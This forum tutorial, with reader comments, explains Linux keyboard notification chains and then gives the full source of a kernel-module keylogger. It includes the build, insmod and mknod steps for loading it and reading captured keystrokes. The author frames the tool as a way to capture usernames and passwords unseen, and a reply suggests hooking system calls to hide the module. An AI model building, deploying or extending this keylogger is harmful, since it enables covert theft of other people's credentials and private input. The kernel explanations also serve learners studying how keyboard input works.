Linux Keylogger and Notification Chains

Preface
In this paper we will create a very basic Linux keylogger. Keylogging is the act of recording every key the user presses on the keyboard. It typically happens without the user being aware of it, which gives the hacker the opportunity to capture usernames and passwords. Our keylogger will capture all printable ASCII characters typed on the user's keyboard.
To do that, we first need a brief introduction to Linux Notification Chains. We will also use Loadable Kernel Modules (LKM) and character device drivers.

Author Assigned Level: Wannabe

Required Skills

I will try to explain a little bit of everything, but I cannot go deep into every topic, as some of them are outside the scope of this paper. That’s why some knowledge of the following topics is recommended:

  • Linux OS basic stuff
  • Loadable Kernel Modules (LKM)
  • Character Device Drivers

Disclaimer

This paper is obviously for self-research purposes only, I don’t encourage the use of this material to do any harm, blah, blah blah


First things first: Linux Notification Chains

Before we start writing any code, we should have a general idea of what we are coding. Let’s first ask ourselves the interesting question here: how does the OS keep track of everything that is typed on the keyboard? In general, subsystems in the Linux kernel are very independent, and events captured or generated by one of them might interest others. How do they communicate when an unexpected event happens?

The answer is using Notification Chains.

A notification chain is simply a list of functions that are called once an event happens. Subsystems can register themselves in any notification chain (created by other subsystems) by supplying a function pointer that will be called once an event happens. Using technical terms, we could say that there is the notifier subsystem and the notified subsystems. The notifier creates a list to which any other subsystem might register.

The main structure used in Notification Chains is notifier_block, listed below (linux/notifier.h):

struct notifier_block {
	notifier_fn_t notifier_call;
	struct notifier_block __rcu *next;
	int priority;
};

Here is what each field means:

  • notifier_call: This is a pointer to the callback function that will be called once an event happens.
  • next: the name Notification chain is self-explanatory. The notifier will have a chain of callback functions, which means that each notifier_block must point to the next one in order to call all registered functions. This next variable will point to the next notifier_block. It will be set automatically by the kernel.
  • priority: This will indicate the priority of the function. Functions with higher priorities will be executed first in the callback chain list. By default, the priority level is set to 0.

The notifier_call function declaration looks like this:

typedef	int (*notifier_fn_t)(struct notifier_block *nb, unsigned long action, void *data);

The meaning of each input parameter is:

  • nb - The notifier_block currently being called.
  • action - A value indicating the type of event that occurred.
  • data - A pointer that can be used to pass extra information about the event that occurred.

Once the notified subsystem has initialized this struct, it needs to append it to the desired Notification Chain using the general function notifier_chain_register(struct notifier_block **list, struct notifier_block *n). The kernel also provides wrappers for this function, for example:

int register_inetaddr_notifier(struct notifier_block *nb); /* Will add nb to the inetaddr notification list */
int register_reboot_notifier(struct notifier_block *nb); /* Register to this Notification Chain if you want to be notified when there's going to be a system reboot */

These functions are wrappers that will call the general notifier_chain_register function with the correct chain list. The one we are interested in is (linux/keyboard.h):

int register_keyboard_notifier(struct notifier_block *nb);
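
To make the registration step more concrete, here is a small userspace sketch of how a chain can be kept sorted by priority and how a wrapper can hide its chain head. It is a model written for this article, not the kernel's code: struct demo_block, demo_chain_register, demo_keyboard_chain and demo_register_keyboard are all hypothetical names, and the real kernel code additionally deals with locking and RCU.

```c
#include <assert.h>
#include <stddef.h>

/* Userspace stand-in for struct notifier_block (hypothetical demo type). */
struct demo_block {
	int (*notifier_call)(struct demo_block *nb, unsigned long action, void *data);
	struct demo_block *next;
	int priority;
};

/* Insert n in front of the first entry with a lower priority, so the
 * list stays ordered from highest to lowest priority. Entries with the
 * same priority keep their registration order. */
static int demo_chain_register(struct demo_block **list, struct demo_block *n)
{
	assert(list != NULL && n != NULL);
	while (*list != NULL) {
		if (n->priority > (*list)->priority)
			break;
		list = &(*list)->next;
	}
	n->next = *list;
	*list = n;
	return 0;
}

/* A wrapper owns one chain head and passes it to the general function,
 * so callers only have to supply their block. */
static struct demo_block *demo_keyboard_chain;

static int demo_register_keyboard(struct demo_block *nb)
{
	return demo_chain_register(&demo_keyboard_chain, nb);
}
```

Registering blocks with priorities 0, 5 and 0 (in that order) through demo_register_keyboard leaves the priority 5 block at the head of the chain, followed by the two priority 0 blocks in the order they were registered.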

But before we start getting our hands dirty, a couple more things about chain lists:

Notice how the callback type notifier_fn_t returns an int. The notifier expects a return value from each callback function. The value should be one of the following (extracted from linux/notifier.h):

#define NOTIFY_DONE		0x0000		/* Don't care */
#define NOTIFY_OK		0x0001		/* Suits me */
#define NOTIFY_STOP_MASK	0x8000		/* Don't call further */
#define NOTIFY_BAD		(NOTIFY_STOP_MASK|0x0002)
						/* Bad/Veto action */
/*
 * Clean way to return from the notifier and stop further calls.
 */
#define NOTIFY_STOP		(NOTIFY_OK|NOTIFY_STOP_MASK)

  • NOTIFY_DONE - The notified subsystem is not interested in this event.
  • NOTIFY_OK - Notification was processed correctly.
  • NOTIFY_BAD - Something went wrong. Stop calling the callback routines for this event.
  • NOTIFY_STOP - Notification processed correctly, but no need to call further routines in the chain list.
  • NOTIFY_STOP_MASK is just a mask that is applied to NOTIFY_BAD and NOTIFY_STOP to stop further calls.
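
The effect of these return values can be sketched in userspace. The model below walks a chain and stops as soon as a callback returns a value with the stop bit set. Everything prefixed with demo_ or DEMO_ is a hypothetical name made up for this illustration; only the numeric values are taken from the defines above.

```c
#include <assert.h>
#include <stddef.h>

/* Same values as the NOTIFY_* defines quoted above. */
#define DEMO_NOTIFY_DONE      0x0000
#define DEMO_NOTIFY_OK        0x0001
#define DEMO_NOTIFY_STOP_MASK 0x8000
#define DEMO_NOTIFY_STOP      (DEMO_NOTIFY_OK | DEMO_NOTIFY_STOP_MASK)

/* Userspace stand-in for struct notifier_block (hypothetical demo type). */
struct demo_block {
	int (*notifier_call)(struct demo_block *nb, unsigned long action, void *data);
	struct demo_block *next;
	int priority;
};

/* Call every callback in order; stop early when one of them returns a
 * value that has DEMO_NOTIFY_STOP_MASK set. Returns the last value seen. */
static int demo_call_chain(struct demo_block *head, unsigned long action, void *data)
{
	int ret = DEMO_NOTIFY_DONE;
	struct demo_block *nb;

	for (nb = head; nb != NULL; nb = nb->next) {
		assert(nb->notifier_call != NULL);
		ret = nb->notifier_call(nb, action, data);
		if (ret & DEMO_NOTIFY_STOP_MASK)
			break;
	}
	return ret;
}

/* Sample callback: counts the call in *data and lets the chain go on. */
static int demo_ok(struct demo_block *nb, unsigned long action, void *data)
{
	(void)nb;
	(void)action;
	++*(int *)data;
	return DEMO_NOTIFY_OK;
}

/* Sample callback: counts the call in *data and stops the chain. */
static int demo_stop(struct demo_block *nb, unsigned long action, void *data)
{
	(void)nb;
	(void)action;
	++*(int *)data;
	return DEMO_NOTIFY_STOP;
}
```

With a chain of demo_ok, demo_stop, demo_ok, only the first two callbacks run: the second one returns DEMO_NOTIFY_STOP, so the third is never reached.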

Last but not least, there are equivalent unregister_XXX_notifier functions to unregister from a chain list.

Using the Keyboard Notification Chain

The Notification Chain we will be registering to is the Keyboard Notification Chain, and for that we will use the wrapper function register_keyboard_notifier. Before that, we will first need to create the notifier_block struct and the callback function. As a reminder, the callback function must look like this:

typedef	int (*notifier_fn_t)(struct notifier_block *nb, unsigned long action, void *data);

The data parameter

A couple of lines above I mentioned that the data parameter is used to pass extra information to the notified subsystem about the event that occurred. The Keyboard Notification Chain uses this pointer to pass all data related to the key pressed. For that, it uses the following structure (linux/keyboard.h):

struct keyboard_notifier_param {
	struct vc_data *vc;	/* VC on which the keyboard press was done */
	int down;		/* Pressure of the key? */
	int shift;		/* Current shift mask */
	int ledstate;		/* Current led state */
	unsigned int value;	/* keycode, unicode value or keysym */
};

We will not use everything in this structure, only the down and value variables.

  • down - This variable can be either 0 or 1. A 1 means that the key has been pressed, a 0 means that the key has been released.
  • value - This variable will contain the actual data representation of the key pressed (e.g. 0x41 for A)

The action parameter

When describing the declaration of the callback function, I also mentioned that the action parameter describes the type of event. For the Keyboard Notification Chain, this value may be one of the following (linux/notifier.h):

/* Console keyboard events.
 * Note: KBD_KEYCODE is always sent before KBD_UNBOUND_KEYCODE, KBD_UNICODE and
 * KBD_KEYSYM. */
#define KBD_KEYCODE		0x0001 /* Keyboard keycode, called before any other */
#define KBD_UNBOUND_KEYCODE	0x0002 /* Keyboard keycode which is not bound to any other */
#define KBD_UNICODE		0x0003 /* Keyboard unicode */
#define KBD_KEYSYM		0x0004 /* Keyboard keysym */
#define KBD_POST_KEYSYM		0x0005 /* Called after keyboard keysym interpretation */

  • KBD_KEYCODE - these events are always sent before other events, holding the keycode
  • KBD_UNBOUND_KEYCODE - these events are sent if the keycode is not bound to a valid character
  • KBD_UNICODE - these events are sent if the translation from the keycode to a valid character produced a unicode character
  • KBD_KEYSYM - these events are sent if the translation from the keycode to a valid character produced a non-unicode character
  • KBD_POST_KEYSYM - these events are sent after the treatment of non-unicode keysyms.

Knowing this, we should only be interested in those notifications whose event type is KBD_KEYSYM, as they will hold the printable ASCII characters.
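
As a rough illustration of that decision, the userspace sketch below takes the three pieces of information discussed so far (action, down and value) and returns either the character to log or 0. demo_filter_key and DEMO_KBD_KEYSYM are hypothetical names for this example; the sketch assumes that the character sits in the low byte of value, which is what a cast to char keeps.

```c
#include <assert.h>

#define DEMO_KBD_KEYSYM 0x0004 /* same value as KBD_KEYSYM above */

/* Returns the printable ASCII character to log, or 0 when the event
 * should be ignored. */
static char demo_filter_key(unsigned long action, int down, unsigned int value)
{
	unsigned char c;

	assert(down == 0 || down == 1);

	/* Only keysym events for a key being pressed are interesting. */
	if (action != DEMO_KBD_KEYSYM || !down)
		return 0;

	/* Keep the low byte only and accept printable ASCII (0x20..0x7e). */
	c = (unsigned char)(value & 0xff);
	if (c >= 0x20 && c < 0x7f)
		return (char)c;
	return 0;
}
```

A key press with value 0x41 under KBD_KEYSYM yields 'A', while the matching key release, any other event type, and non-printable values such as 0x7f all yield 0.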

Getting Dirty: The steps to build our Linux Keylogger

Once all this theory has been absorbed, we can start coding our very first Linux Keylogger. For that, we will have to create a Loadable Kernel Module (LKM). There are plenty of posts both on 0x00sec and Google that talk about LKMs and how to use them to create Device Drivers and RootKits, so a very brief introduction is more than enough.

Quoting from The Linux Kernel Module Programming Guide:

Another important thing to keep in mind is where we want to save all the logged keys. When you are writing an LKM, opening and reading/writing files is strongly discouraged (Driving Me Nuts - Things You Never Should Do in the Kernel), so we need a different approach. For this example, I will create a Character Device that will keep track of all logged keys. This means we will have to implement the Device Driver in our LKM.

The functionality of the Keylogger is as follows:

  • We will hold all logged keys in a buffer.
  • We will create a Character Device Driver along with its character device file. Every time the device file is read, the buffer will be printed to the screen and it will be zeroed out.
  • We will register our LKM to the Keyboard Notification Chain using a notifier_block. For that we will have to create the callback function that will handle each keypress.
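
The buffer behaviour described in the first two points can be modelled in plain userspace C before moving to the kernel. This is only a sketch under a few assumptions: the buffer is deliberately tiny so that the wipe is easy to trigger, and demo_buffer, demo_append and demo_drain are hypothetical names that do not appear in the module itself.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define DEMO_BUFFER_LEN 8 /* tiny on purpose, so the wipe is easy to trigger */

static char demo_buffer[DEMO_BUFFER_LEN];
static size_t demo_pos; /* number of characters stored so far */

/* Store one character. Once the buffer is full, wipe it and start over,
 * which throws away everything that was not read in time. */
static void demo_append(char c)
{
	assert(demo_pos < DEMO_BUFFER_LEN);
	demo_buffer[demo_pos++] = c;
	if (demo_pos >= DEMO_BUFFER_LEN) {
		memset(demo_buffer, 0, sizeof(demo_buffer));
		demo_pos = 0;
	}
}

/* Copy out at most cap characters, then zero the buffer, like a read of
 * the device file would. Returns the number of characters copied. */
static size_t demo_drain(char *out, size_t cap)
{
	size_t n = demo_pos < cap ? demo_pos : cap;

	memcpy(out, demo_buffer, n);
	memset(demo_buffer, 0, sizeof(demo_buffer));
	demo_pos = 0;
	return n;
}
```

Appending 'h' and 'i' and then draining returns those two characters, and a second drain returns nothing. Appending DEMO_BUFFER_LEN characters without draining in between triggers the wipe, so the following drain also returns nothing. That is the price of this simple design: whatever is not read before the buffer fills up is lost.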

Here you have the code, well documented:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>     // __init and __exit
#include <linux/keyboard.h>
#include <linux/fs.h>
#include <linux/string.h>   // memset and strlen
#include <linux/uaccess.h>
#include <linux/notifier.h>

// Module Info
#define DEVICE_NAME "keylog0"  // The Device name for our Device Driver
static int major;  // The Major Number that will be assigned to our Device Driver

// Keylogger Info
#define BUFFER_LEN 1024
static char keys_buffer[BUFFER_LEN];  // This buffer will contain all the logged keys
static char *keys_bf_ptr = keys_buffer; // Points to the next free position in keys_buffer
// Our buffer will only be of size 1024. If the user typed more than 1024 valid characters, keys_bf_ptr would run past the end of it
static int buf_pos = 0;  // buf_pos keeps track of the count of characters stored to avoid overflows in kernel space

// Prototypes
static ssize_t dev_read(struct file *, char __user *, size_t, loff_t *); // Device Driver read prototype
static int keys_pressed(struct notifier_block *, unsigned long, void *); // Callback function for the Notification Chain

// Setting the Device Driver read function
static struct file_operations fops = {
	.read = dev_read
};

// Initializing the notifier_block
static struct notifier_block nb = {
	.notifier_call = keys_pressed
};


static int keys_pressed(struct notifier_block *nb, unsigned long action, void *data) {
	struct keyboard_notifier_param *param = data;
	
	// We are only interested in those notifications that have an event type of KBD_KEYSYM and the user is pressing down the key
	if (action == KBD_KEYSYM && param->down) {
		char c = param->value;
		
		// We will only log those key presses that actually represent an ASCII character. 
		if (c == 0x01) {
			*(keys_bf_ptr++) = 0x0a;
			buf_pos++;
		} else if (c >= 0x20 && c < 0x7f) {
			*(keys_bf_ptr++) = c;
			buf_pos++;
		}
		
		// Beware of buffer overflows in kernel space!! They can be catastrophic!
		if (buf_pos >= BUFFER_LEN) {
			buf_pos = 0;
			memset(keys_buffer, 0, BUFFER_LEN);
			keys_bf_ptr = keys_buffer;
		}
	}	
	return NOTIFY_OK; // We return NOTIFY_OK, as "Notification was processed correctly"
}

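// Device driver read function
// Note: nothing here protects the buffer against a key press arriving in the middle of a read
static ssize_t dev_read(struct file *fp, char __user *buf, size_t length, loff_t *offset) {
	size_t len = strlen(keys_buffer);

	// Never copy more than the caller's buffer can hold
	if (len > length)
		len = length;

	// copy_to_user returns the number of bytes it could NOT copy, not an error code
	if (copy_to_user(buf, keys_buffer, len)) {
		printk(KERN_INFO "Couldn't copy all data to user space\n");
		return -EFAULT;
	}
	memset(keys_buffer, 0, BUFFER_LEN); // Reset buffer after each read
	keys_bf_ptr = keys_buffer; // Reset buffer pointer
	buf_pos = 0; // Reset the counter too, otherwise the callback would wipe the buffer too early
	return len;
}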

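static int __init keylog_init(void) {
	int ret;

	major = register_chrdev(0, DEVICE_NAME, &fops);
	if (major < 0) {
		printk(KERN_ALERT "keylog failed to register a major number\n");
		return major;
	}

	printk(KERN_INFO "Registered keylogger with major number %d\n", major);

	// Clear the buffer before the callback can start writing to it
	memset(keys_buffer, 0, BUFFER_LEN);
	ret = register_keyboard_notifier(&nb);
	if (ret) {
		unregister_chrdev(major, DEVICE_NAME); // Undo the first step if the second one fails
		return ret;
	}
	return 0;
}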

static void __exit keylog_exit(void) {
	unregister_chrdev(major, DEVICE_NAME);
	unregister_keyboard_notifier(&nb);
	printk(KERN_INFO "Keylogger unloaded\n");
}

module_init(keylog_init);
module_exit(keylog_exit);
MODULE_LICENSE("GPL");

You might have noticed that this code snippet doesn’t create the actual Device file. We can create it from the command line once we know the Device Driver major number. First we need to compile and insmod the LKM to find out the major number.

root@kali:~/keylogger# make
root@kali:~/keylogger# insmod keylogger.ko
root@kali:~/keylogger# tail -n1 /var/log/kernel.log
Dec  4 22:36:55 kali kernel: [41524.351867] Registered keylogger with major number 247
root@kali:~/keylogger# mknod keylog0 c 247 0 # Create the device as a 'c' character device, with 247 as major number and 0 as minor number

Once the device is created, try entering a website or start writing a text document and, after a few seconds, cat the keylog0 contents. You should see the results of your first Linux Keylogger!

Conclusions

With this paper I hope that you got a pretty good understanding of how Linux communicates unexpected events between subsystems using Notification Chains, and how you can use them in your LKMs! I even challenge you to create your own LKM that uses Notification Chains to do whatever you want on your Linux machine!

I also hope that you had as much fun as I had while researching all this :)

See you around,
~hasp0t

It’s awesome to see your first article @hasp0t! I really enjoyed reading through this. I do, however, have some questions for you.

I see that you are only logging printable ASCII characters, and that is all dandy as long as somebody is typing everything correctly, but what happens when somebody presses the backspace, the tab, or the enter key? Is that logged too? I was under the impression that they are not printable ASCII characters, but ASCII control characters.

Would it be a better approach to instead log KBD_KEYCODE, and then convert it to ASCII when you write to the file?

I am also very interested in how you have decided to create a device to log to.

Does this reduce the stealth of the module? Would there be any way for me to discover this by casually poking around the system?

Question: If we wipe the buffer in keys_pressed, are we potentially losing some data if it’s not written to the file in dev_read first?


Great tut. Enjoyed it a lot.

The keys pressed are identified at 3 different, consecutive levels:

  • Scancodes: The lowest level. This is the raw data that the keyboard sends to the kernel. The kernel, depending on the keyboard layout configured, will convert these scancodes to keycodes.
  • Keycodes: The second level. These don’t represent any character. You can think of keycodes as functions. Pressing ‘c’ is not the same as pressing ‘ctrl+c’. Both will be represented by different keycodes, so you can’t convert them to ASCII that easily.
  • Keysyms: The highest level, which identifies the key pressed. Here, in both the ‘c’ and ‘ctrl+c’ cases the value variable will be the same (‘c’). So, the kernel does the job of converting the Keycode to a Keysym for you.

As I just wanted to create a simple Keylogger, I was happy with catching ctrl+c as a ‘c’ character. Further work should be done to identify those function keys.

Backspace is encoded as 0x7f in ASCII. Notice how I filtered out this case when reading the KEYSYM received. Imagine the case where the user writes a password in one terminal, then opens another terminal and starts hitting the backspace, not deleting anything. If we didn’t filter the backspace key, the password written in the first terminal would be deleted in the log. Again, this was a basic Keylogger, so for me it was fine if the user mistakenly wrote a password wrong, as I would still (possibly) be able to get it.

Writing and reading files in the Kernel isn’t recommended at all. I’ve been working on Device Drivers for a couple of weeks now, so I thought it would be good practice to use a character device for the logged keys. The module won’t be stealthier: it will still be printed out when lsmoding or using cat /proc/modules. To create a stealth module you could maybe hook the system calls used when reading /proc/modules to filter the output shown in the console. This might be good practice too.

Hope this helped!

You are right. If you don’t read the contents of the device file first and the user enters 1024 characters, the logged data will be lost. This example was used for demonstration purposes. Further work should be done in order to keep the data without losing any. Maybe dynamically allocate kernel memory once the buffer fills up? Another solution would be to create a user-space program that reads the contents of the device and writes them to a file. Then, from the module, notify the user-space program that the buffer is full or about to fill up, so that the user-space program reads and clears the contents without losing any data.

Hope this helped!

If you are confused about character devices and major/minor numbers like I was after reading this, I found this helpful article: http://derekmolloy.ie/writing-a-linux-kernel-module-part-2-a-character-device
